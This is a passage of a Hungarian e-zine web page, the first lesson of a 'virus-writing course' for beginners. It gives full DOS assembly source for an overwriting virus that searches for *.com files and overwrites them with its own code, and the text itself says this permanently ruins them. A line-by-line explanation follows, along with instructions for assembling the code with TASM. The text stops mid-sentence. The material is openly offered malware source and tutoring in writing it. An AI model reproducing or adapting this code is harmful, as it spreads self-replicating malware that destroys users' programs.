<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>Virus&iacute;r&oacute; tanfolyam</title>
<meta name="generator" content="Namo WebEditor v3.0">
</head>

<body background="bg2.gif" bgcolor="white" text="black" link="blue" vlink="purple"
 alink="red">

<h2 align="center"><font face="Comic Sans MS">V&iacute;rus&iacute;r&oacute; 
tanfolyam - Els&otilde; r&eacute;sz</font></h2>
<p><font face="Comic Sans MS">A legegyszer&ucirc;bb &eacute;s egyben semmire 
se val&oacute;, de az&eacute;rt n&eacute;mi j&oacute;sz&aacute;nd&eacute;kkal 
v&iacute;rusnak nevezhet&otilde; virusfajt&aacute;t pr&oacute;b&aacute;lom ebben 
a cikkben le&iacute;rni &eacute;s megtan&iacute;tani nektek. A tervek szerint 
ez egy &aacute;lland&oacute; rovat lesz az e-zine-ben, amely seg&iacute;ts&eacute;get 
pr&oacute;b&aacute;l ny&uacute;jtani a kezd&otilde; v&iacute;rus&iacute;r&oacute;knak.</font></p>
<p><font face="Comic Sans MS">&nbsp;&nbsp;Sz&oacute;val ebben az cikkben a COM 
futtathat&oacute; f&aacute;jlokat fert&otilde;z&otilde;, fel&uuml;l&iacute;r&oacute; 
(overwriter) v&iacute;rusokr&oacute;l lesz sz&oacute;. A COM f&aacute;jlokr&oacute;l 
r&ouml;viden: Neve a Copy Of Memory ( a mem&oacute;ria m&aacute;sa) r&ouml;vid&iacute;t&eacute;sb&otilde;l 
ered. Mint a neve is mutatja a f&aacute;jlban ugyan&uacute;gy &aacute;ll minden, 
ahogy a mem&oacute;ri&aacute;ba val&oacute; bet&ouml;lt&otilde;d&eacute;s ut&aacute;n 
fog &aacute;lni. Egy COM file maxim&aacute;lissan egy mem&oacute;ria szegmens 
nagys&aacute;g&uacute; lehet, azaz 64k. Minden COM-nak fix a bel&eacute;p&eacute;si 
pontja (entry-point), azaz a saj&aacute;t szegmens&eacute;nek 100h offset&eacute;n 
kezd&otilde;dik.</font></p>
<p><font face="Comic Sans MS">&nbsp;&nbsp;Felt&eacute;telezem, hogy valami asm 
alapokkal m&aacute;r rendelkezel, mert az elengedhetetlen... Ha m&eacute;gse 
rendelkezn&eacute;l alap asm tud&aacute;ssal, vagy a fent eml&iacute;tett COM-okn&aacute;l 
haszn&aacute;lt szavak nem vil&aacute;gossak, akkor n&eacute;zd &aacute;t a 
Lucifer &aacute;lltal &iacute;rt ASM Tutori&aacute;l sorozatot, amit szint&eacute;n 
megtal&aacute;lsz az e-zine-ban.</font></p>
<p><font face="Comic Sans MS">El&otilde;sz&ouml;r is n&eacute;zz&uuml;k hogyan 
dolgoznak az ilyen primit&iacute;v v&iacute;rusok:<br>
El&otilde;sz&ouml;r van az eredti program &eacute;s a v&iacute;rus:<br>
</font><font face="Courier">+----------------------------+</font><font face="Comic Sans MS"><br>
</font><font face="Courier">| &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Eredeti program 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<br>
+----------------------------+</font></p>
<p><font face="Courier">+----------------+<br>
| Fel&uuml;l&iacute;r&oacute; Virus |<br>
+----------------+</font></p>
<p><font face="Comic Sans MS">Miut&aacute;n megt&ouml;rt&eacute;nt a fert&otilde;z&eacute;s, 
&iacute;gy n&eacute;z ki a fert&otilde;z&ouml;tt program:<br>
</font><font face="Courier">+---------------+------------+</font><font face="Comic Sans MS"><br>
</font><font face="Courier">| Fel&uuml;l&iacute;r&oacute; Virus|rogram &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<br>
+---------------+------------+</font><font face="Comic Sans MS">&nbsp;</font></p>
<p><font face="Comic Sans MS">Teh&aacute;t a v&iacute;rus fogta mag&aacute;t, 
&eacute;s fel&uuml;l&iacute;rta a program elej&eacute;t a saj&aacute;t k&oacute;dj&aacute;val. 
Az &iacute;gy fert&otilde;z&ouml;tt program NEM m&ucirc;k&ouml;d&otilde;k&eacute;pes, 
&eacute;s a v&iacute;rus elt&aacute;vol&iacute;tasa ut&aacute;n se lesz az, 
teh&aacute;t MARADAND&Oacute; k&aacute;rosod&aacute;st okoz a fert&otilde;z&ouml;tt 
programokban. Mostm&aacute;r ismerj&uuml;k mag&aacute;t a m&ucirc;k&ouml;d&eacute;si 
elvet, most n&eacute;zz&uuml;k &aacute;t pontr&oacute;l pontra, hogy mit kell 
a v&iacute;rusunknat tennie:<br>
1. Keressen egy &aacute;ldozatot<br>
2. Nyissa meg<br>
3. &Iacute;rja hozz&aacute; fel&uuml;l saj&aacute;t k&oacute;dj&aacute;val az 
&aacute;ldozat program elej&eacute;t<br>
4. Z&aacute;rja le a f&aacute;jl<br>
5. Keresse a k&ouml;vetkez&otilde;t. Ha tal&aacute;lt vissza a 2. ponthoz, ha 
nem akkor tov&aacute;bb...<br>
6. Kil&eacute;p&eacute;s</font></p>
<p><font face="Comic Sans MS">N&eacute;zz&uuml;nk akkor egy ilyen v&iacute;rus:</font></p>
<p><font face="Courier New" size="2">virus &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;segment 
<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;assume 
&nbsp;cs:virus, ds:virus</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;org 
&nbsp;&nbsp;&nbsp;&nbsp;100h</font></p>
<p><font face="Courier New" size="2">Start: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,4Eh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,offset file_mask<br>
@Find:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int &nbsp;&nbsp;&nbsp;&nbsp;21h<br>
@Open: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jc &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@Exit<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ax,3D01h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,9Eh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xchg 
&nbsp;&nbsp;&nbsp;bx,ax<br>
@Write_body: &nbsp;&nbsp;&nbsp;mov &nbsp;&nbsp;&nbsp;&nbsp;ah,40h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;cx,offset end_of_virus - offset start<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,100h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Courier New" size="2">@Close: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,3Eh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Courier New" size="2">@FindNext: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,4Fh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jmp 
&nbsp;&nbsp;&nbsp;&nbsp;@Find</font></p>
<p><font face="Courier New" size="2">@Exit: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;20h</font></p>
<p><font face="Courier New" size="2">file_mask &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;db 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'*.com',0<br>
end_of_virus &nbsp;&nbsp;&nbsp;label<br>
virus &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ends<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end 
&nbsp;&nbsp;&nbsp;&nbsp;start</font></p>
<p><font face="Comic Sans MS">Ugy nem is olyan bonyolult... De ha nem &eacute;rted, 
ne igzulj, az&eacute;rt vagyok &eacute;n, hogy elmagyar&aacute;zzam. Most sorrol-sorra 
vesz&uuml;k az eg&eacute;szet:</font></p>
<p><font face="Courier New" size="2">virus &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;segment 
<br>
</font><font face="Comic Sans MS">Ezzel be&aacute;ll&iacute;tjuk a programunk 
(azaz v&iacute;rusunk) szegmens&eacute;t, amelyben az v&iacute;rus k&oacute;dja 
&eacute;s adatai lenni fognak. Ebben az esetben a szegmensnek a `v&iacute;rus` 
nevet adtuk.</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;assume 
&nbsp;cs:virus, ds:virus</font></p>
<p><font face="Comic Sans MS">Mint m&aacute;r eml&iacute;tettem a COM f&aacute;jlok 
egy szemgensbe vannak csak. Az assume a </font><font face="Comic Sans MS"><u>c</u></font><font
 face="Comic Sans MS">ode </font><font face="Comic Sans MS"><u>s</u></font><font
 face="Comic Sans MS">zegmenshez (cs-hez) &eacute;s a </font><font face="Comic Sans MS"><u>d</u></font><font
 face="Comic Sans MS">ata </font><font face="Comic Sans MS"><u>s</u></font><font
 face="Comic Sans MS">zegmenshez (ds-hez) is a virus szegmensc&iacute;m&eacute;t 
rendeli. Teh&aacute;t ha a v&iacute;rusunk p&eacute;ld&aacute;ul a 12af:0100 
c&iacute;mre t&ouml;lt&otilde;dik be, akkor a bet&ouml;lt&otilde;d&eacute;s 
utan a cs &eacute;s a ds 12af lesz.</font></p>
<p><font face="Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;org 
&nbsp;&nbsp;&nbsp;100h</font></p>
<p><font face="Comic Sans MS">Az org 100h azt mondja a ford&iacute;t&oacute;nak 
hogy a program a 100h c&iacute;men kezd&otilde;dik (100h - 256), azaz k&ouml;zvetlen&uuml;l 
a </font><font face="Comic Sans MS"><u>P</u></font><font face="Comic Sans MS">rogram 
</font><font face="Comic Sans MS"><u>S</u></font><font face="Comic Sans MS">egment 
</font><font face="Comic Sans MS"><u>P</u></font><font face="Comic Sans MS">refix 
(PSP) ut&aacute;n, de err&otilde;l k&eacute;s&otilde;bb. A l&eacute;nyeg, hogy 
a program bet&ouml;lt&otilde;d&eacute;se utan az </font><font face="Comic Sans MS"><u>I</u></font><font
 face="Comic Sans MS">nstruction </font><font face="Comic Sans MS"><u>P</u></font><font
 face="Comic Sans MS">ointer (IP) 100h-ra mutat (mint minden COM f&aacute;jln&aacute;l).</font></p>
<p><font face="Courier New" size="2">Start: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,4Eh</font></p>
<p><font face="Comic Sans MS">A Start: az egy label (egy cimke), amire majd 
a tov&aacute;bbiakban lehet hivatkozni, p&eacute;ld&aacute;ul ugr&aacute;sokn&aacute;l. 
A mov az a move (mozgat&aacute;s) sz&oacute; r&ouml;vid&iacute;t&eacute;se. 
Teh&aacute;t ez a sor az ax azaz az akkuml&aacute;tor regiszter fels&otilde; 
byte-j&aacute;ba (ah) 4Eh &eacute;rt&eacute;ket rak.... majd megl&aacute;tod 
mire j&oacute; ez...</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,offset file_mask</font></p>
<p><font face="Comic Sans MS">Ez a dx regiszterbe berakja a file_mask offszet&eacute;t, 
azaz hogy hol tal&aacute;lhat&oacute;.</font></p>
<p><font face="Courier New" size="2">@Find:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Comic Sans MS">Itt egy &uacute;jabb label, majd egy int &nbsp;&nbsp;&nbsp;21h. 
Az INT utas&iacute;t&aacute;s megh&iacute;vja a be&aacute;ll&iacute;tott funkci&oacute;t. 
Nem akarok most r&eacute;szletessen kit&eacute;rni r&aacute;... &Ouml;sszesen 
256 int van (int - interrupt - megszak&iacute;t&aacute;s), de ha a k&uuml;l&ouml;mb&ouml;z&otilde; 
be&aacute;ll&iacute;tasokat, regisztereket figyelembe veszed, t&ouml;bb sz&aacute;z 
funkci&oacute;t tudsz megh&iacute;ni. Tulajdonk&eacute;ppen minden int-kor egy 
el&otilde;re elk&eacute;sz&iacute;tett kis rutint h&iacute;vsz meg a be&aacute;ll&iacute;tott 
regiszterekkel. Ebben az esetben a 21h sz&aacute;m&uacute; megszak&iacute;t&aacute;s 
4Eh sz&aacute;m&uacute; rutinj&aacute;t h&iacute;vtuk meg. Ez a rutin megkeresi 
az aktu&aacute;lis k&ouml;nyvt&aacute;rban l&eacute;v&otilde; ELS&Otilde; f&aacute;jlt, 
amelyikre r&aacute;illik a ds:dx-en l&eacute;v&otilde; f&aacute;jl maszk ( a 
mi eset&uuml;nkben *.COM).</font></p>
<p><font face="Courier New" size="2">@Open: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jc 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@Exit</font></p>
<p><font face="Comic Sans MS">A k&ouml;vetkez&otilde; utas&iacute;t&aacute;s 
egy felt&eacute;teles ugr&aacute;s. A jc a </font><font face="Comic Sans MS"><u>J</u></font><font
 face="Comic Sans MS">ump if </font><font face="Comic Sans MS"><u>C</u></font><font
 face="Comic Sans MS">arry, azaz ugorj ha a Carry flag 1-es, azaz be van &aacute;ll&iacute;tva. 
Az el&otilde;bb megh&iacute;vott megszak&iacute;tas 1-esre &aacute;ll&iacute;tja 
a carry-t ha nem tal&aacute;lt megfelel&otilde; f&aacute;jlt, null&aacute;ra 
pedig ha tal&aacute;lt. Sz&oacute;val ha nem tal&aacute;lt akkor ugrik az @Exit 
labelra.</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ax,3D01h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,9Eh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Comic Sans MS">Ha minden igaz, akkor tal&aacute;ltunk egy f&aacute;jlt, 
amit meg k&eacute;ne nyitni. Ezt a megint a 21h inten kereszt&uuml;l tehetj&uuml;k. 
El&otilde;sz&ouml;r is az ah-ba 3Dh-t kell raknunk, ez jelenti ugyanis a megnyit&aacute;st. 
Ezutan az al-be kell a hozz&aacute;f&eacute;r&eacute;si m&oacute;dot megadni. 
Ebben az esetben ez 01h, ami azt jelenti, hogy csak &iacute;r&aacute;sra nyitjuk 
meg (00h - Csak olvas&aacute;s, 02h - &Iacute;r&aacute;s/Olvas&aacute;s). Mint 
tudjuk az ax az ah-b&oacute;l (fels&otilde; byte) es az al-b&otilde;l (als&oacute; 
byte) &aacute;ll, ez&eacute;rt a kett&otilde;t egybe is vonhatjuk. Ekkor ez 
&iacute;gy n&eacute;z ki: mov ax,3D01h. A k&ouml;vetkez&otilde; hogy be&aacute;ll&iacute;tjuk 
a dx-et. A dx-nek a megnyitand&oacute; f&aacute;jl nev&eacute;re kell mutatni. 
Szinte hallom hogy mondod: 'Mi a fene... nekem a 9Eh nem hason&iacute;t semmilyen 
f&aacute;jln&eacute;vre...'. H&aacute;t nem is f&aacute;jln&eacute;v, hanem 
a f&aacute;jlnev&eacute;t tartalamz&oacute; sztringre offszet&eacute;t tartalmazza. 
A 9Eh a PSP-n bel&uuml;l mutat egy helyre, m&eacute;ghozz&aacute; a DTA-n bel&uuml;l 
a f&aacute;jln&eacute;vre. A DTA a </font><font face="Comic Sans MS"><u>D</u></font><font
 face="Comic Sans MS">isk </font><font face="Comic Sans MS"><u>T</u></font><font
 face="Comic Sans MS">ransfer </font><font face="Comic Sans MS"><u>A</u></font><font
 face="Comic Sans MS">rea-b&oacute;l sz&aacute;rmazik. A PSP mint mondottam 
a szegmens elej&eacute;n kezd&otilde;dik, azaz 0h-n. Ezen bel&uuml;l a DTA 80h-n. 
A DTA tartalmazza annak &nbsp;a f&aacute;jlnak az inform&aacute;ci&oacute;it, 
amelyet az el&otilde;bb tal&aacute;ltunk. Ami nek&uuml;nk kell, az a f&aacute;jl 
neve, ami a DTA kezdet&eacute;t&otilde;l 1Eh-ra van, teh&aacute;t a kett&otilde; 
egy&uuml;tt 9Eh. Mostm&aacute;r v&eacute;grehajthatjuk az int-et.</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;xchg 
&nbsp;&nbsp;&nbsp;bx,ax<br>
@Write_body: &nbsp;&nbsp;&nbsp;mov &nbsp;&nbsp;&nbsp;&nbsp;ah,40h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;cx,offset end_of_virus - offsetr start<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;dx,100h<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Comic Sans MS">A k&ouml;vetkez&otilde; dolog, hogy hozz&aacute;&iacute;rjuk 
a v&iacute;rusunkat az &aacute;ldozathoz. Ezt is az 21h-s inten kereszt&uuml;l 
tessz&uuml;k, m&eacute;ghozz&aacute; a 40h al-rutinj&aacute;val (mov ah,40h). 
Az el&otilde;z&otilde; int a megnyitott f&aacute;jl handle-j&eacute;t (magyar 
sz&oacute;t nem tal&aacute;ltam r&aacute;... esetleg kezel&otilde;...) az ax-ben 
adja vissza, viszont nek&uuml;nk az &iacute;r&aacute;sn&aacute;l (&eacute;s 
a legt&ouml;bb t&ouml;bbi f&aacute;jlkezel&otilde; rutinn&aacute;l) a bx-be 
kell raknunk. Mondhatn&aacute;d mi sem egyszer&ucirc;bb mov bx,ax.... Igen &aacute;m, 
de nek&uuml;nk minden b&aacute;jt sz&aacute;m&iacute;t, ez&eacute;rt pr&oacute;b&aacute;ljuk 
egy kicsit optimiz&aacute;lni. Ezert a xchg-el (e</font><font face="Comic Sans MS"><u>xch</u></font><font
 face="Comic Sans MS">an</font><font face="Comic Sans MS"><u>g</u></font><font
 face="Comic Sans MS">e - felcser&eacute;l&eacute;s) felcser&eacute;ljuk az 
ax &eacute;s a bx tartalm&aacute;t. A cx-be kell hogy legyen, hogy h&aacute;ny 
byte-ot szeretn&eacute;nk &iacute;rni. Ezt univerz&aacute;lisra c&eacute;lszer&ucirc; 
meg&iacute;rni. A mi eset&uuml;nkben a k&eacute;t label k&uuml;l&ouml;ms&eacute;g&eacute;t 
fogja a ford&iacute;t&oacute; beleford&iacute;tani &eacute;rt&eacute;kk&eacute;nt 
a programba. A start az a v&iacute;rus legelej&eacute;n van, az end_of_virus 
pedig a v&eacute;g&eacute;n. A kett&otilde; k&uuml;l&ouml;mbs&eacute;ge megadja 
mag&aacute;t a v&iacute;rus hossz&aacute;t. A dx-be (pontosabban a ds:dx-be, 
de COM-n&aacute;l nem kell a ds-el t&ouml;r&otilde;dn&ouml;d, mivel az megegyezik 
a cs-el) j&ouml;n, hogy honnan &iacute;rja a byteokat a f&aacute;jlba. Ez 100h, 
mert a COM-ok 100h c&iacute;men kezd&otilde;dnek... Majd megh&iacute;vjuk a 
rutint...</font></p>
<p><font face="Courier New" size="2">@Close: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,3Eh<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;21h</font></p>
<p><font face="Comic Sans MS">Majd v&eacute;gezet&uuml;l le kell z&aacute;rnunk 
a megnyitott f&aacute;jlt... &eacute;s tal&aacute;lj&aacute;tok ki melyik megszak&iacute;t&aacute;ssal... 
h&aacute;t persze, a 21h-ssal. A 3Eh az a bez&aacute;r&aacute;st jelenti, a 
f&aacute;jl handle a bx-be kell, de azt m&aacute;r az el&otilde;bb bele raktuk, 
&uacute;gyhogy ezek ut&aacute;n csak meg kell h&iacute;vni az int-et.</font></p>
<p><font face="Courier New" size="2">@FindNext: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov 
&nbsp;&nbsp;&nbsp;&nbsp;ah,4Fh<br></font></p>
<p><font face="Comic Sans MS">A 4Fh rutin a 'Keresd a k&ouml;vetkez&otilde;t' 
rutint jel&ouml;li.</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jmp 
&nbsp;&nbsp;&nbsp;&nbsp;@Find</font></p>
<p><font face="Comic Sans MS">Majd visszaugrunk a @Find-ra, ahol a j&oacute;l 
megszokott int 21h v&aacute;r.</font></p>
<p><font face="Courier New" size="2">@Exit: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;int 
&nbsp;&nbsp;&nbsp;&nbsp;20h</font></p>
<p><font face="Comic Sans MS">A 20h megszak&iacute;t&aacute;s ak&aacute;rmilyen 
param&eacute;terrel lehet h&iacute;vni, &eacute;s a programb&oacute;l val&oacute; 
kil&eacute;p&eacute;st id&eacute;zi el&otilde;.</font></p>
<p><font face="Courier New" size="2">file_mask &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;db 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'*.com',0<br></font></p>
<p><font face="Comic Sans MS">Ez az adat r&eacute;sze a v&iacute;rusnak... Igaz 
m&eacute;g csak egy adat van. El&otilde;sz&ouml;r egy file_mask nev&ucirc; adatot 
defin&aacute;lunk, amely byte-okb&oacute;l &aacute;ll (db... ha word-okb&oacute;l 
&aacute;llna, akkor dw-t haszn&aacute;ltunk volna), majd megadjuk az &eacute;rt&eacute;k&eacute;t. 
Ha ha egybe szeretn&eacute;nk megadni az adatot egy sztring k&eacute;nt akkor 
azt egyes illetve sima id&eacute;z&otilde;jelbe kell raknunk, mint itt a *.com 
ahogy van. Ha k&uuml;l&ouml;n byteonk&eacute;nt akarjuk megadni, akkor a byte-okat 
vessz&otilde;vel v&aacute;laszthatjuk el. Ezt a k&eacute;t m&oacute;dszert szabadon 
keverhetj&uuml;k, mint a mi p&eacute;ld&aacute;nkban is, mivel a keres&otilde; 
rutin (amelyik haszn&aacute;lja ezt az adatot) onnan tudja hogy a sztring v&eacute;g&eacute;re 
&eacute;rt, hogy ott egy 0-as byte van.</font></p>
<p><font face="Courier New" size="2">end_of_virus &nbsp;&nbsp;&nbsp;label</font></p>
<p><font face="Comic Sans MS">Ez egy simma label, amelynek az end_of_virus nevet 
adtam. Ez a v&iacute;rus hossz&aacute;nak sz&aacute;m&iacute;t&aacute;s&aacute;n&aacute;l 
kell.</font></p>
<p><font face="Courier New" size="2">virus &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ends</font></p>
<p><font face="Comic Sans MS">A virus szegmens v&eacute;ge (ends - end of segment).</font></p>
<p><font face="Courier New" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end 
&nbsp;&nbsp;&nbsp;&nbsp;start</font></p>
<p><font face="Comic Sans MS">Az end pedig azt mondja hogy ez &iacute;tt a v&eacute;ge 
a programnak a start meg az&eacute;rt kell, hogy a ford&iacute;t&oacute; tudja, 
hogy hol a program eleje.. Ennek akkor van nagyobb jelent&otilde;s&eacute;ge 
ha t&ouml;bb szegmensel dolgozol.... De egyenl&otilde;re el&eacute;gedj meg 
annyival hogy ez kell &eacute;s k&eacute;sz.</font></p>
<p><font face="Comic Sans MS">Ezzel befejezt&uuml;k az elemz&eacute;s&eacute;t. 
Annyit eml&iacute;ten&eacute;k m&eacute;g meg, hogy hogyan lehet kommentezni 
a forr&aacute;s f&aacute;jlokat. A pontosvessz&otilde; (;) ut&aacute;n &iacute;rhatsz 
ak&aacute;r mit az kommentnek sz&aacute;m&iacute;t, a ford&iacute;t&oacute; 
figyelembe se veszi. Az eg&eacute;sz sor lehet komment, pl &iacute;gy:<br>
; Ez itt egy egysoros megjegyz&eacute;s<br>
De lehet az utas&iacute;t&aacute;sok utan is rakni megjegyz&eacute;seket. Pl.:<br>
xor cx,cx &nbsp;&nbsp;&nbsp;; A cx &eacute;rt&eacute;k&eacute;t null&aacute;zza.</font></p>
<p><font face="Comic Sans MS">Ezzel befejezt&uuml;k az els&otilde; leck&eacute;t. 
A v&iacute;rust a k&ouml;vetkez&otilde; m&oacute;don ford&iacute;thatod le:<br>
tasm virus.asm<br>
Ekkor valami ilyet kellene hogy kapj&aacute;l:</font></p>
<p><font face="Courier New" size="2">Turbo Assembler &nbsp;Version 3.2 &nbsp;Copyright 
(c) 1988, 1992 Borland International</font></p>
<p><font face="Courier New" size="2">Assembling file: &nbsp;&nbsp;virus.asm<br>
Error messages: &nbsp;&nbsp;&nbsp;None<br>
Warning messages: &nbsp;None<br>
Passes: &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1<br>
Remaining memory: &nbsp;357k</font></p>
<p><font face="Comic Sans MS">L&eacute;nyeg, hogy a nincs semmilyen hiba (error 
messages: none). Ezut&aacute;n ebben a k&ouml;nyvt&aacute;rban meg kellet hogy 
